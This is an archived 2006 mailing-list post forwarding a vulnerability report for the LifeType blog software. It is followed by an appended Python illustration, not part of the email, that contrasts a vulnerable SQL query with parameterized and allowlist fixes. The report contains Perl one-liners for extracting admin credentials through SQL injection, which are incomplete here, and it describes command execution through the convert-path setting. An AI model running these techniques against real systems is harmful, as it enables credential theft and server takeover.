[pLog-svn] Fwd: Security problem

Oscar Renalias oscar at renalias.net
Mon Jul 3 15:57:45 GMT 2006

Can somebody quickly investigate this?

---------- Forwarded message ----------
From: A. Ramos <aramosf at unsec.net>
Date: Jul 3, 2006 5:45 PM
Subject: Security problem
To: contact at lifetype.net

Hello :-)

There is one SQL injection in the latest version of LifeType:

To get md5 passwd:
perl -MLWP::Simple -e "getprint
| perl -ne 'print "password: ".$1."\n" if /articleId=(\w*).*h3/'

To get admin username:
perl -MLWP::Simple -e "getprint
| perl -ne 'print "admin: ".$1."\n" if /articleId=(\w*).*h3/'

And if you can access the admin control panel, you can run commands
on the system by changing the value of /usr/bin/convert and putting in your own
command. Upload some picture and wait for it to be resized with the evil command.

I think there are more bugs but I haven't time to check for more.

Thank you.


A. Ramos  <aka dab>
mailto: <aramosf at unsec.net>
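As an added illustration from the maintainers' side (not code from the report or from LifeType itself; Python rather than the project's PHP, using a constructed in-memory schema whose table and column names are assumptions), the two fixes the report points at: treat articleId as a bound integer parameter instead of SQL text, and only run a resize binary that is on a fixed allowlist rather than whatever path is stored in the admin settings:

```python
import re
import sqlite3

# Constructed stand-in for the blog database; table and column names are
# assumptions for this example, not LifeType's real schema.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT)")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, pass_md5 TEXT)")
    db.executemany("INSERT INTO articles VALUES (?, ?)", [(1, "Hello"), (2, "World")])
    # constructed sample hash, not a real credential
    db.execute("INSERT INTO users VALUES (1, 'admin', 'd41d8cd98f00b204e9800998ecf8427e')")
    return db

def parse_article_id(raw):
    """Strict validation: articleId must be a short decimal integer, nothing else."""
    if raw is None or not re.fullmatch(r"[0-9]{1,10}", raw):
        return None
    return int(raw)

def article_title_unsafe(db, raw):
    # The vulnerable pattern: the request value is spliced into the SQL text,
    # so a UNION in the parameter reads other tables (here, users.pass_md5).
    sql = "SELECT title FROM articles WHERE id = " + raw
    return [row[0] for row in db.execute(sql)]

def article_title_safe(db, raw):
    article_id = parse_article_id(raw)
    if article_id is None:
        return []  # reject anything that is not a plain integer id
    # Bound parameter: the value never becomes part of the SQL grammar.
    return [row[0] for row in
            db.execute("SELECT title FROM articles WHERE id = ?", (article_id,))]

# Fixed allowlist of resize binaries; an admin setting may pick one of these
# but cannot point the resizer at an arbitrary executable.
ALLOWED_CONVERT = {"/usr/bin/convert", "/usr/local/bin/convert"}

def is_allowed_convert(path):
    return path in ALLOWED_CONVERT

def resize_command(convert_path, src, dst, size="640x480"):
    """Build the argv for the resize step as a list (no shell), after the allowlist check."""
    if not is_allowed_convert(convert_path):
        raise ValueError("resize binary is not on the allowlist")
    return [convert_path, src, "-resize", size, dst]
```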
